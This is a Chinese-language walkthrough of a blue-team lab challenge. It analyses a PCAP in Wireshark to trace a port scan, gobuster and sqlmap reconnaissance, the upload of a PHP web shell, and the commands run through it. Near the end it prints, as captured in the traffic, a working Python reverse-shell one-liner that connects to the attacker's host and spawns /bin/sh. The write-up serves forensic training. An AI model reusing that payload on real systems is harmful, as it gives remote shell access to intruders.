1、题目简介
1.1 背景介绍
SOC在其 SIEM 中收到“本地到本地端口扫描”警报,其中内部私有 IP 开始扫描另一个内部系统。您能否调查并确定此活动是否是恶意的?您已经获得了 PCAP,可以使用您希望使用的任何工具进行调查。
1.2 题目链接
https://blueteamlabs.online/home/challenge/network-analysis-web-shell-d4d3a2821b
2、题目解析
2.1 负责进行端口扫描活动的 IP 是什么?
开始网络分析了解哪些主机在数据包捕获中进行通信,打开wireshark选择【统计】--【会话】,查看TCP会话状态。
我们正在寻找端口扫描活动,这意味着一个 IP 地址扫描另一个 IP 地址上的所有端口,在TCP会话中选择对目标端口Port B进行排序,发现源IP地址10.251.96.4进行扫描。
2.2 可疑主机扫描的端口范围是多少?
针对目的端口进行排序,发现端口范围为1-1024
2.3 进行的端口扫描类型是什么?
针对攻击源IP10.251.96.4进行过滤,过滤方法:ip.src == 10.251.96.4,看到大量SYN数据包发送到每个端口10.251.96.5。这告诉我们进行了TCP SYN扫描。
2.4 另外两个工具用于对开放端口进行侦察,它们是什么?
1.第一个工具
要获得第一个侦察工具,我们可以查看User-Agent,通过过滤器ip.dst == 10.251.96.5 && http.user_agent查看过滤内容,通过GET请求查看User-Agent为gobuster 3.0.1
2.第二个工具
继续基于User-Agent判断,并通过过滤器ip.dst == 10.251.96.5 && http.user_agent && http.request.method == POST,查看比较长的一段内容,看到User-Agent为sqlmap 1.4.7
2.5 攻击者通过其上传 Web shell 的 php 文件的名称是什么?
当有人向网页发送信息时通过HTTP POST请求,过滤http.request.method==POST查找相关信息。通过upload.php页面上传2个文件,一个是PNG图片,一个是PHP文件。
查看Referer字段中内容,发现有http://10.251.96.5/editprofile.php信息
2.6 攻击者上传的 web shell 的名称是什么?
基于该POST上传,追踪HTTP流,分析原始HTTP请求信息
发现上传文件名称为:dbfunctions.php
2.7 Web shell 中用于执行命令的参数是什么?
查看上传文件的内容信息中为PHP代码,执行的命令参数为cmd
2.8 攻击者执行的第一个命令是什么?
根据获取到的webshell内容信息,基于GET请求作为过滤条件进行查询,过滤条件ip.dst == 10.251.96.5 && http.request.method == GET,查看请求执行内容为cmd=id
2.9 攻击者通过命令执行获得的shell连接类型是什么?
在流量中还看到了一个通过 GET 方法发送的 python 代码
查看详情信息,并通过URL解码发现脚本使用"socket"模块,该脚本连接到服务器并提供"/bin/sh"外壳。这种连接到远程服务器的方法用于启动反向 shell
/uploads/dbfunctions.php?cmd=python -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.251.96.4",4422));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);'
2.10 他用于 shell 连接的端口是什么?
基于解码后的内容查看,反弹shell连接的端口为4422
原文始发于微信公众号(安全孺子牛):BLTO靶场-网络分析-Web Shell
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论